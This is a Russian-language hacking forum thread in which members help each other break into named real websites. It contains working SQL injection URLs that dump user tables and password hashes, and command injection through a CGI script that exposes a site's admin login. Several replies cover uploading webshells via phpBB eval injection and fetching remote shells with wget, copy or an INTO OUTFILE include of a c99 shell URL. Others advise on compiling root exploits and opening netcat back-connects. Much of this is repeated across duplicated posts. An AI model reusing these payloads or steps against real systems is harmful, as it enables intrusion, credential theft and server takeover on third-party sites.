Пробовал проинклудить, тож ни чего не получилось, всё отключено, system() тоже...

Есть ли в такой ситуации возможность просмотреть конфиг ?

Получил я админский акк от булки, залил шелл и мне вылетела не приятная надпись:
Warning: shell_exec() has been disabled for security reasons in /faq.php(302) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 361

Пробовал проинклудить, тож ни чего не получилось, всё отключено, system() тоже...

Есть ли в такой ситуации возможность просмотреть конфиг ?
1 залить другой шелл на пхп
2 залить шелл на другом языке, например на перле
3 покурить тему safe_mode bypass. есть даже видео от BlackSun
4 если надо только прочесть файл, то не обязательно иметь полноценный шелл с исполнение команд, можно просто сделать fopen. главное чтобы прав хватило.

Получил я админский акк от булки, залил шелл и мне вылетела не приятная надпись:
Warning: shell_exec() has been disabled for security reasons in /faq.php(302) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 361

Пробовал проинклудить, тож ни чего не получилось, всё отключено, system() тоже...

Есть ли в такой ситуации возможность просмотреть конфиг ?

passthru(); ну или fopen(); copy();

phpinfo();
если в нём allow_url_fopen=on, делай copy('http:///ww.site.com/shell.txt','/tmp/shell.php');
потом инклудишь его
если off, смотриш на сейф мод, на дизейбл функшнс, там уже по обстоятельствам

Залил шелл через phpbb, с помощью востановления базы.......
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd])' WHERE user_id=2; Пытаюсь залить madshell в папку /var/www/images/ (права есть).....
делаю так,
http://site.com/forum/profile.php?mode=editprofile&cmd=wget%20http://host.com/papka/shell.php%20-o%20/var/www/images/tyrytrytr.php
файл создался, но в ответ при открытие я получаю,
--17:50:03-- http://host.com/papka/shell.php => `shell.php' Resolving host.com... xx.xx.xx.xx Connecting to host.com[xx.xx.xx.xx]:80... failed: Connection timed out.-------------------
Почему так???Что такое??

Время подключения к хосту превышено, попробуй воспользоваться шеллом с другого сайта

я пробовал c madnet.name, freehostia, и со своих шеллов, не хочет что то

Ну для начала можно научится юзать wget:
wget http://site.ru/1.txt -O shell.php - это сохранит скаченный файл с указанным именем
а не:
wget http://site.ru/1.txt -o shell.php - это поместит лог работы в указанный файл

Только если хост тормознутый, то это не лучший способ - загрузи аватарку с шеллом, а потом просто поменяй расширение на пхп.

врятли) разницы не вижу даже при substring'e

Ну для начала можно научится юзать wget:
wget http://site.ru/1.txt -O shell.php - это сохранит скаченный файл с указанным именем
а не:
wget http://site.ru/1.txt -o shell.php - это поместит лог работы в указанный файл

Только если хост тормознутый, то это не лучший способ - загрузи аватарку с шеллом, а потом просто поменяй расширение на пхп.
в данном случае нельзя грузить аватары, chmod на аватарки и images, cache, и все другое, доступны для записи только папки в корне сайта, но при
wget http://site.ru/1.txt -O shell.php , просто создается пустой файл нечего не качается....

cmd=copy('site/shell.txt', 'полный путь до папки drwrwrw/shell.php');

а чем тебе так не лучше?

HAXTA4OK, а толку? если у него хост не конектиться к другим серверам, что при wget'e что при copy результат будет один и тот же

А форму для загрузки не судьба использовать?

Локально такуйю форму:


<form action=http://site.com/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/var/www/images/tyrytrytr.php
method=post enctype=multipart/form-data>
<input type=file name=file><br>
<input type=submit value=Загрузить><br>
</form>


только предварительно сидеть у себя в браузере зарегенным на форуме в едит профайле и открывать эту форму в том же браузере, ибо куки. С сразу грузить с компа нормальный шелл

как можно использовать то, что при подстановке кавычки появляется следующее:

Server Error in '/inclub' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.


Stack Trace:

[FormatException: Input string was not in a correct format.]
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +0
InClub.Allegati.Page_Load(Object sender, EventArgs e) +95
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750

или это:

Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:

Line 35: private void PopulateDetails()
Line 36: {
Line 37: int intCompanyID = int.Parse(Request.QueryString["CompanyID"]);
Line 38: //int intCompanyID = 20;
Line 39: CompanyHandler objHandler = new CompanyHandler();


Source File: c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsR eadOnlyView.ascx.cs Line: 37

Stack Trace:

[FormatException: Input string was not in a correct format.]
System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7471335
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119
System.Int32.Parse(String s) +23
CMSWebParts_Viewers_CompanyDetailsReadOnlyView.Pop ulateDetails() in c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsR eadOnlyView.ascx.cs:37
CMSWebParts_Viewers_CompanyDetailsReadOnlyView.Pag e_Load(Object sender, EventArgs e) in c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsR eadOnlyView.ascx.cs:25
System.Web.Util.CalliHelper.EventArgFunctionCaller (IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Cal lback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
CMS.PortalControls.CMSAbstractWebPart.OnLoad(Event Args e) +212
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627

Input string was not in a correct format.
строка не в том формате,там нет скули.
>>как можно использовать то?
увидешь пару строчек кода:
Line 35: private void PopulateDetails()
Line 36: {
Line 37: int intCompanyID = int.Parse(Request.QueryString["CompanyID"]);
Line 38: //int intCompanyID = 20;
Line 39: CompanyHandler objHandler = new

и директорию:
c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsR eadOnlyView.ascx.cs Line: 37

А форму для загрузки не судьба использовать?

Локально такуйю форму:


<form action=http://site.com/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/var/www/images/tyrytrytr.php
method=post enctype=multipart/form-data>
<input type=file name=file><br>
<input type=submit value=Загрузить><br>
</form>


только предварительно сидеть у себя в браузере зарегенным на форуме в едит профайле и открывать эту форму в том же браузере, ибо куки. С сразу грузить с компа нормальный шелл

я чего то не понимаю наверное :)

правлю сурс страницы, выбираю, гружу, шелла нет

))) какой сурс еще?:))) То, что я назвал форма, создай на рабочем столе, обзови 123.html и запусти в том же браузере, где ты УЖЕ сидишь зарегенный на форуме

ЗЫЖ Скопируй код в блокнот, сохрани как 123.txt и переименуй в 123.html, щелкни два раза по файлу мышкой и загружай шелл. Форм экшион сама перенаправит тебя туда, куда нужно

Ах да, вместо site.com вставь реальное название:))

я только что сейчас так сделал)) не получилось))

Тогда по обстоятельствам. Всякое бывает. Надо смотреть

ЗЫЖ В личку ничего не слать

А у тебя хоть phpinfo(); хотя бы выводит?

да, выводит)
там еще phpmyadmin, но при
select '<? @include("http://madnet.name/files/download/9_c99madshell.php"); ?>' into outfile '/var/www/images/323232323232.php';

он мне

SQL query: SELECT '&lt;? @include("http://madnet.name/files/download/9_c99madshell.php"); ?&gt;' INTO OUTFILE '/var/www/images/323232323232.php'
#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

select 0x3c3f2040696e636c7564652822687474703a2f2f6d61646e 65742e6e616d652f66696c65732f646f776e6c6f61642f395f 6339396d61647368656c6c2e70687022293b203f3e into outfile '/var/www/images/323232323232.php';
так же все, ковычки

еще раз прошу помощи, а именно в поиске названий таблиц и столбцов в 4-ой версии mysql, вот линк _http://www.deyla.com/p_daelenco.php?id_sito=-1+union+select+1, ???? ,3,4,5,6,7,8,9,10,11+from+ ??? --

select 0x3c3f2040696e636c7564652822687474703a2f2f6d61646e 65742e6e616d652f66696c65732f646f776e6c6f61642f395f 6339396d61647368656c6c2e70687022293b203f3e into outfile '/var/www/images/323232323232.php';

еще раз прошу помощи, а именно в поиске названий таблиц и столбцов в 4-ой версии mysql, вот линк _http://www.deyla.com/p_daelenco.php?id_sito=-1+union+select+1, ???? ,3,4,5,6,7,8,9,10,11+from+ ??? --

брут, например c помощью SIPT4

:.']Скуля? :(
http://www.zhytomyr.ukrtelecom.ua/offers/webcams?id=61

нет

Народ. Помогите раскрутить скулю. http://www.berline.kiev.ua/?id=5
делаю запрос +union+select+1 - выводит ошибку бла-бла-бла different number of columns.
Прочитал про нее в большом FAQе jokester'a, но всеравно как-то "широко глаза" на этот трабл не открыло.
зы Если не трудно, то можно показать по подробнее на данном примере как добиться вывода запроса.

Народ. Помогите раскрутить скулю. http://www.berline.kiev.ua/?id=5
делаю запрос +union+select+1 - выводит ошибку бла-бла-бла different number of columns.
Прочитал про нее в большом FAQе jokester'a, но всеравно как-то "широко глаза" на этот трабл не открыло.
зы Если не трудно, то можно показать по подробнее на данном примере как добиться вывода запроса.

http://www.berline.kiev.ua/?id=-1+union+select+version()--+

там 1 колонка, вывод в тайтле, смотри внимательней...

http://forum.antichat.ru/threadnav46016-782-10.html

:confused: :confused: :confused: так ни кто и не ответит да??

http://forum.antichat.ru/threadnav46016-782-10.html

:confused: :confused: :confused: так ни кто и не ответит да??
В чём проблема использовать уже готовый сплойт? зачем тебе эта прога? ты вручную собрался перебирать?

смысл не в сплоите а в том почему у меня так же не получается произвести SQL

и главный смысл мне понять как в коде найти SQL (явный код я знаю как там найти а тут не догодался бы) вот и пытался сделать так же ..НО борода

P.S. про сплоит речи не было

>>код я знаю как там найти
сотсавь регулярку и парсь.

смысл не в сплоите а в том почему у меня так же не получается произвести SQL

и главный смысл мне понять как в коде найти SQL (явный код я знаю как там найти а тут не догодался бы) вот и пытался сделать так же ..НО борода

P.S. про сплоит речи не было

Баг будет работать при register_globals=ON

Ну и разумеется если версию не пропатчили. Тот кусок кода который привёл ты не даёт полной картины. Фильтры там стоят вообще в другом файле, самого запроса у тебя тоже нет. Какого совета ты хочешь?
Перичитай статью Электа, посмотри ещё раз видио, если ты имея на руках сорцы не видишь по коду есть скуль или нет, то наверное нужно браться за то что попроще, а не задавать вопросы на которые нет ответов.

Это из серии "я подставил кавычку и у меня ошибка, как мне взломать сайт".

Народ вот нашел уязвимость,
http://www.rukso.ru/news/own/999190'+and+1=2+union+select+1,1,1,4,5,6,1+from+_m embers+--+

Но не могу подобрать колонки, можно отсюда чтонить выжать?

http://www.rukso.ru/admin/ - админка соответственно

Народ вот нашел уязвимость,
http://www.rukso.ru/news/own/999190'+and+1=2+union+select+1,1,1,4,5,6,1+from+_m embers+--+

Но не могу подобрать колонки, можно отсюда чтонить выжать?

http://www.rukso.ru/admin/ - админка соответственно

Table 'rukso._members' doesn't exist

Ты бы сначала таблицу правильно подобрал...

Так я и грю, что таблицы не подобрать! а _members оставил чтобы инъект было видно!

information_schema не доступна. Просто может кто этот CMS Знает и таблицу юзеров подскажет?
Или какой другой вариант пробывать?

Так я и грю, что таблицы не подобрать! а _members оставил чтобы инъект было видно!

information_schema не доступна. Просто может кто этот CMS Знает и таблицу юзеров подскажет?
Или какой другой вариант пробывать?


http://www.rukso.ru/news/own/999190+or+1=0 - шаг 1

http://www.rukso.ru/news/own/999190+or+1=1 - шаг 2

http://www.rukso.ru/news/own/999190+or+1=1+and+substring(version(),1,1)=4 - шаг 3


Дальше хз, вроде слепая просто


information_schema недоступна


Дык 4-ая ветка, её там и нет, только брут, по определению

1.Здрасте. Короче вот http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|ls|

это выполнение команд на серве. я узнал что на серве есть PHP.
У меня есть шелл на народе.

Помогите залить шелл через выплнение команд. т.е. надо создать файл с расш. пхп и запусить? помогите плиз.

и подскажите дерикторию плиз в которой сайт лежит

ЗЫ деф. не буду. чесн слово.


2. Помогите заюзать InetCrack чтобы в данном логе осталась моя запись например PRIVET?

http://www.lohuis.ro/index.php?page=../../../../../../../../../../var/log/apache/error_log%00

Тэк.... Вообщем идём сюда :http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|cat%20../htdocs/admin/config.inc.php| там подглядываем такое:

$login["server"]="localhost";
$login["user"]=$DBUser;
$login["password"]=$DBPass;
$login["database"]="insotag";

$ftpuser=$login["user"];
$ftppass=$login["password"];

$ftpserver="www.insolvenzrechtstag.de";
$ftppfad="www/htdocs/pdfdoc";

$webpfad="../pdfdoc";

$adminuser="insotag";
$adminpass="hoersaal";

$admintemplate="../Templates/administration.dwt";
$erfassentemplate="../Templates/erfassen.dwt";
$bearbeitentemplate="../Templates/bearbeiten.dwt";
$loeschentemplate="../Templates/loeschen.dwt";
Отсюда видно, что $adminuser="insotag";
$adminpass="hoersaal";
Потом идём сюда: http://www.insolvenzrechtstag.de/admin/ вводим логин и пароль, проходим в http://www.insolvenzrechtstag.de/admin/index.php?modus=erfassen и заливаем шелл... так как я в немецком нини то... :)

Можно ли что-то сделать с этим запросом в скрипте $row = mysql_query("INSERT INTO table (id,text) VALUES ('$id', '$text')");?
Допустим вставить свои данные в другую таблицу?
Переменные id и text никак не фильтруются, на сервере включены magic quotes, mysql 5.

Можно ли что-то сделать с этим запросом в скрипте $row = mysql_query("INSERT INTO table (id,text) VALUES ('$id', '$text')");?
Допустим вставить свои данные в другую таблицу?
Переменные id и text никак не фильтруются, на сервере включены magic quotes, mysql 5.

при включенных magic_quotes нельзя.

Подскажите плиз. имеется WEB Shell на серваке. называется WSO2.
На милворе нашол сплоит на C под этот сервак. Как через вебшелл запустить этот сплоит?
http://milw0rm.com/search.php?dong=Linux+Kernel+2.6.29

add
// резервисты пришли, посмотрели и ушли :D :D :D

nub-hacker
На форуме куча статей, по запуску сплоитов в том числе.

Будешь продолжать ничего не читая задавать вопросы и переносить сюда тему PHP инъекций с просьбой залить шелл , этот мультиакк тоже уйдёт в бан.

Мне даже в модцп не нужно лезть, что-бы понять кто ты.

Подскажите плиз. имеется WEB Shell на серваке. называется WSO2.
На милворе нашол сплоит на C под этот сервак. Как через вебшелл запустить этот сплоит?


Для начала надо забиндить порт, в wso это если не ошибаюсь в разделе network. А затем приконектишься с помощью netcat и откомпилишь командой gcc предварительно сохраненный на серваке сплойт. Например так, gcc sploit.c. Далее запускаешь сплойт ./sploit.c.

Народ,чем к бд приконнектиться ещё можно ?

SQL Manager:
Can't connect
Client does not support authentication protocol requested by server; consider upgrading MySQL client

Выдаёт мой любимый с99 модификэйтед )))).

Постом выше, WSO, автор шелла тусит тут, так что в случае чего и вопросы будет кому задавать

Люди,чем объяснить то,что у одних клиентов одного и того же хостера работает компиль.а у других не то,что не работает,а даже не установлен ?

Разные тарифные планы, соответственно разные возможности у каждоно клиента, так было всегда и так будет абсолютно у любого хостера

Интересно.А как определить наличие файрволла на FreeBsd/Linux ?Есть какой-нибудь список путей или чего-то подобного ? Другие средства защиты ?

Ещё вопрос: Вот на хостинге определенного юзера есть файлы вида:

m.png 2.5 KB 04.05.2009 21:51:12 20350/120 -rw-r--r--

Но таких групп в /etc/group и нету!А с системных юзеров типо root,daemon,adm и т.д. файлы можно удалять,хотя шелл говорит о том,что прав я таких не имею.Как это объяснить ?Я не нашёл ни одного иденитфикатора (20350 или 120) в файле групповой политики.Так что же,их не существует вовсе? И как они связаны тогда ? Ничего не понимаю...Встречал кто-нибудь что-либо подобное ?

Ещё вопрос: Как сделать так,чтобы при запросе любой папки/файла всё время выдавался ответ 200 ОК. Всегда интересовало,как это у них выходит.

что касается FreeBSD и его файрвола (по умолчанию ipfw), можешь посмотреть в /etc/rc.conf на предмет firewall_enable="YES"
в этом же конфиге будет указано где находится скрипт с правилами

Что касается linux систем, то такие скрипты правил находятся: /etc/init.d/
rc.firewall, rc.fw и т.п.

с вторым вопросом.. не сталкивался, нужно смотреть.
по последнему вопросу.. не совсем понял, что имеется ввиду.

ну ты можешь удалять файлы если папка в которой они находятся
либо drwxrwxrwx, либо ты работаешь от юзера который является владельцем этой папкой, либо находишься в группе и права на папку у группы rwx. Если всё так то ты можешь удалять любые файлы, хоть они будут руту принадлежать. Однако если на файлах стоит стики бит +S, удалить такой файл может только его владелец

по последнему: это скорее всего настройки веб-сервера в .htaccess, либо скриптом. Посмотри, вроде в вордпрессе как то реализована эта фича
Вообще это называется soft 404
http://en.wikipedia.org/wiki/404_error

m.png 2.5 KB 04.05.2009 21:51:12 20350/120 -rw-r--r--

Но таких групп в /etc/group и нету!А с системных юзеров типо root,daemon,adm и т.д. файлы можно удалять,хотя шелл говорит о том,что прав я таких не имею.Как это объяснить ?Я не нашёл ни одного иденитфикатора (20350 или 120) в файле групповой политики.Так что же,их не существует вовсе? И как они связаны тогда ? Ничего не понимаю...Встречал кто-нибудь что-либо подобное ?


Может быть там симуляция реальной системы внутри подкаталога, т.е. с прогаммой chroot или jail,

see chroot (http://ru.wikipedia.org/wiki/Chroot)

Подставляю

-1 union select username,2,3 from my_realmd.account where username=0x416e79626973 limit 1,1--

Не выводит то что в колонке username (именно с where... не выводит почему то)(вывод username поставил для того чтобы убедиться правильно ли where сработал)
В чем дело? Правильный ли у меня запрос? (ах да он у меня ошибки не выдает... то есть where username=... сработал!)
И еще прежде чем вывести кого то из таблицы я решил найти какой нибуть ник (username колонка) и потом по нему вывести через where ---> все равно не получается

Если вместо 0x416e79626973 подставить неверный параметр 00416e79626973 то получается выводит он мне такое:

Unknown column '00416e79626973' in 'where clause'

sql-inj не могу дать так как хочеться самому все сделать (вы просто мне скажите ошибки которые у меня если они есть)

thislimit 1,1--

limit не нужен

-1 union select username,2,3 from account where username=0x416e79626973 --

Ок спасибо!

Вот такой еще вопрос...
В таблице слишком много колонок! Хотелось бы вывести токо определенные результаты (к примеру от одного до 50)
Как это сделать? (и можно ли это вообще сделать)

Ок спасибо!

Вот такой еще вопрос...
В таблице слишком много колонок! Хотелось бы вывести токо определенные результаты (к примеру от одного до 50)
Как это сделать? (и можно ли это вообще сделать)

Если тебе нужно вывести от 1 до 5 колонок СРАЗУ,то limit 1,5 должно помочь )(Мне помогало)

Если нужно вывести записи из конкретных строк или колонок,то:

1+union+select+1,2,3,username,password,6--

или так:

1+union+select+1,2,3,concat_ws(разделите� �ьв HEX,username,password),5,6

или так:

1+union+select+1,2,3,concat(разделитель ,username,разделитель,password,разд елитель)

Если не ошибаюсь,конечно

Это всё работает при MySql.

конкретную запись вывести,тогда так:

1+union+select+1,2,3,4,username,6+from+users+limit +x,1, где х - произвольный номер записи в таблице.

diznt,для того,чтобы грамотно выводилось,нужно всегда объединять поля в таблице.У меня тоже иногда косяки случаются.Выводит тебе Ouknown column,потому что MySql не понял,что перед ним хекс данные - и правильно сделал,так как ты убрал 0x,который и отличает hex от oct (типы данных).В некоторых языках программирования можно и 0 ставить спереди,в некоторых необходимо только 0х.Когда ты пишешь спереди 0x(тут_число в HEX),то он понимает,что перед ним HEX данные,и преобразует их обратно.Так как ты передаёшь данные в кавычках,то он преобразует их в строку.

Ответ будет аналогичен твоему,если ты подставишь в where username='sasasa'.Ошбка та же.

Сам по себе механизм chroot не полностью безопасен. Если программа, запущенная в chroot имеет привилегии root, она может выполнить second chroot для того, чтобы выбраться наружу. Это работает потому, что некоторые ядра Unix не позволяют правильного вложения контекстов chroot.

А как вообще другой пользователь запустит программу с привилегиями root ?
Распространяется ли chroot на подкаталоги того каталога,куда установлена система ?

Вот так выводит:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES--

А вот так уже нет:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES LIM
IT 1,1--

Где грабли?

На сайте есть 2 уязвимых скрипта, но второй доступен только после авторизации на сайте.
Я хочу собрать всю инфу из БД через дампер(в базе 11400~ записей) но если выводить через news.php то в хеше, и только в нем, выводятся только последние 8 символов остальные преобразуются в *
Вот скрин (http://pix.academ.org/img/2009/07/03/92ce598a606e96aa311e6fac022363a4.jpg) как выглядит вывод.
Прошу помочь либо разобраться как можно авторизоваться на сайте через SIPT, либо подсказать как можно обойти такой вывод..

Вот так выводит:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES--

А вот так уже нет:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES LIM
IT 1,1--

Где грабли?


http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,grou p_concat(TABLE_NAME),1,1,1,1,1,2,2,2,2,2,2,2,2+FRO M+INFORMATION_SCHEMA.TABLES--


CTRL+A

а вообще сдался тебе этот лимит:


http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,load _file('/etc/passwd'),1,1,1,1,1,2,2,2,2,2,2,2,2--


или так:

http://www.antisocial.be/dotclear/admin/auth.php

http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,grou p_concat(user_name,user_status,user_pwd),1,1,1,1,1 ,2,2,2,2,2,2,2,2+from+antisocialbe.dc_user--

RedX, добавь в аддишнал хедерс свои куки (в сипте).

или так:

http://www.antisocial.be/dotclear/admin/auth.php

http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,grou p_concat(user_name,user_status,user_pwd),1,1,1,1,1 ,2,2,2,2,2,2,2,2+from+antisocialbe.dc_user--


Пардон, а вот можно с этого момента поподробнее?
Как ты вышел на user_name,user_status,user_pwd и antisocialbe.dc_user?
И, до кучи... Запрос выводит
12ab240ccb8c845c24b708afc7fc050a83629fb9a,1d1c35cc 656c12e10f083e7edec3364861fe88cb4
Я так понимаю, это закриптованные логин и пасс?

На сайте есть 2 уязвимых скрипта, но второй доступен только после авторизации на сайте.
Я хочу собрать всю инфу из БД через дампер(в базе 11400~ записей) но если выводить через news.php то в хеше, и только в нем, выводятся только последние 8 символов остальные преобразуются в *
Вот скрин (http://pix.academ.org/img/2009/07/03/92ce598a606e96aa311e6fac022363a4.jpg) как выглядит вывод.
Прошу помочь либо разобраться как можно авторизоваться на сайте через SIPT, либо подсказать как можно обойти такой вывод..
через SIPT никак, в отношении POST запросов он багганый шо писец, сам хотел через него работать.
Чуть позже я выложу много-поточный скрипт для вывода через POST запросы.

Пардон, а вот можно с этого момента поподробнее?
Как ты вышел на user_name,user_status,user_pwd и antisocialbe.dc_user?
И, до кучи... Запрос выводит
12ab240ccb8c845c24b708afc7fc050a83629fb9a,1d1c35cc 656c12e10f083e7edec3364861fe88cb4
Я так понимаю, это закриптованные логин и пасс?

Сипт может спокойно выводить структуру базы и данные из неё.

Fields user_id:user_pwd

[0]:admin:2ab240ccb8c845c24b708afc7fc050a83629fb9a
[1]:antisocial:d1c35cc656c12e10f083e7edec3364861fe88c b4

Вот что выводит.

На сайте есть 2 уязвимых скрипта, но второй доступен только после авторизации на сайте.
Я хочу собрать всю инфу из БД через дампер(в базе 11400~ записей) но если выводить через news.php то в хеше, и только в нем, выводятся только последние 8 символов остальные преобразуются в *
Вот скрин (http://pix.academ.org/img/2009/07/03/92ce598a606e96aa311e6fac022363a4.jpg) как выглядит вывод.
Прошу помочь либо разобраться как можно авторизоваться на сайте через SIPT, либо подсказать как можно обойти такой вывод..

попробуй так(но так, выведутся только несколько первых записей)
-1' union select 1,2,3,4,group_concat(concat_ws(username,0x3a,sha_p ass_hash) separator 0x20), 6 from realmd.account -- -
А чтобы остальные вывести, пробуй substring, может прокатить.

Сипт может спокойно выводить структуру базы и данные из неё.

Fields user_id:user_pwd

[0]:admin:2ab240ccb8c845c24b708afc7fc050a83629fb9a
[1]:antisocial:d1c35cc656c12e10f083e7edec3364861fe88c b4

Вот что выводит.

Рискуя показаться тупее, чем есть, скажу, что Сипт у меня вообще не находит там дырок. Можешь пошагово расписать свои действия?

попробуй так(но так, выведутся только несколько первых записей)
-1' union select 1,2,3,4,group_concat(concat_ws(username,0x3a,sha_p ass_hash) separator 0x20), 6 from realmd.account -- -
А чтобы остальные вывести, пробуй substring, может прокатить.
Это выводит не больше чем 1024 символа, тем более проблему именно с заменой части хеша на ***** не решает..
ЗЫ Скрин (http://pix.academ.org/img/2009/07/03/aebc6be583f17b94391fc65d1778d807.jpg)

Рискуя показаться тупее, чем есть, скажу, что Сипт у меня вообще не находит там дырок. Можешь пошагово расписать свои действия?
Поставь такие же настройки, потом тыкни Get Quantity, Get Names From Information_Schema, отметь нужные поля и нажми Get Data..
СКРИН (http://pix.academ.org/img/2009/07/03/11397d090e14e8eece395836e365ee3c.jpg)

Поставь такие же настройки, потом тыкни Get Quantity, Get Names From Information_Schema, отметь нужные поля и нажми Get Data..
СКРИН (http://pix.academ.org/img/2009/07/03/11397d090e14e8eece395836e365ee3c.jpg)

Песня не кончается. Get Quantity выполняется нормально, а вот на следующем пункте, после отправки двух запросов, Сипт затыкается. Скрин (http://pix.academ.org/img/2009/07/03/05aa1ece33e8ca267cc85249ef43e2ad.jpg)

Хм, по идее должно работать..

http://www.rsci.ru/company/innov/?Number=10'
как слепая не крутится, как обычная - тоже... помогите :)

http://www.rsci.ru/katalog/second.php?catID=2&PID=-108+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3/*


Database Version: 4.0.27
Database name: rsci
User name: rsci@zvm8
Os : zportbld-freebsd6.3

Для начала надо забиндить порт, в wso это если не ошибаюсь в разделе network. А затем приконектишься с помощью netcat и откомпилишь командой gcc предварительно сохраненный на серваке сплойт. Например так, gcc sploit.c. Далее запускаешь сплойт ./sploit.c.

помогите пожалуйста, уважаемые ачатовцы.
Есть сервак с линем Linux Kernel 2.6.29 и нанём shell WSO2.

Есть локальный сплоит для поднятия рута на С++.

http://milw0rm.com/search.php?dong=Linux+Kernel+2.6.29

Я кагбы новинький в сплоитах, плиз, напишити по конреней дейсвия для его запуска.

2 nub-hacker посмотри видео с того же милворма... первую часть до залития шелла можешь пропустить..а дальше ответ на твой вопрос

http://milw0rm.com/video/watch.php?id=92

nub-hacker
https://forum.antichat.ru/showthread.php?t=26510

2 nub-hacker посмотри видео с того же милворма... первую часть до залития шелла можешь пропустить..а дальше ответ на твой вопрос

http://milw0rm.com/video/watch.php?id=92

Спасибо, подскажи плиз, какой там шелл.

В видио видно что это locus7Shell

2 f1re
Возьми Сипт по старее, та версия что у тебя - славится плохой работой с инфо.шема.

Сообщение от nemaniak
Для начала надо забиндить порт, в wso это если не ошибаюсь в разделе network. А затем приконектишься с помощью netcat и откомпилишь командой gcc предварительно сохраненный на серваке сплойт. Например так, gcc sploit.c. Далее запускаешь сплойт ./sploit.c.

Помогите плиз. я так понял что надо открыть на серваке порт для начала. Я юзаю R57SHELL. Я выбрал

Открытие порта и привязка его к /bin/bash

выставил порт 333
Использовать "C"

далее конктюсь так


C:\Documents and Settings\Серёжа>telnet sitewithshell 333
Подключение к sitewithshell...Не удалось открыть подключение к этому узлу, на
порт 333: Сбой подключения

помогите плиз

nub-hacker ну ты реально нуб...у себя запускай неткат к тебе сервак конектится а не ты к нему..на то и бакконнект

nub-hacker ну ты реально нуб...у себя запускай неткат к тебе сервак конектится а не ты к нему..на то и бакконнект
Дело в том, что я нему быть в роли сервака т.к. я сижу за NATom и проброс портов не могу сделать т.к. NAT осуществляется у прова а не у меня на модеме ((((((((((((
помогите плиз.
//Orb помоги плиз. я тогда буду юзать wso2


/// Какиенить статьи по этому поводу есть на Ачате?

nub-hacker, привет Серёжа =)
делай конект через дедик

jokester: Я узнал его первее, даже без модцп и подсказок. Называй его скорпиончик :)
Spyder: Как мило)
Grey: давайте ему минусов за@#$чим для разнообразия?

Просстите ещё вопрос.
http://site.name/index.php?шв=777+union+select+concat_ws(0x3a,LOA D_FILE(0x2f6574632f706173737764)),2,3,4,5+limit+1, 1/*

Вот инъекция под рутом. По всей видимости использыется ковычек вырбленно т.к с /etc/passwd не вышло и пишлось hexить.

Надо создать файл в /tmp/phpinfo.php

и вбить код <?phpinfo();?>
=========
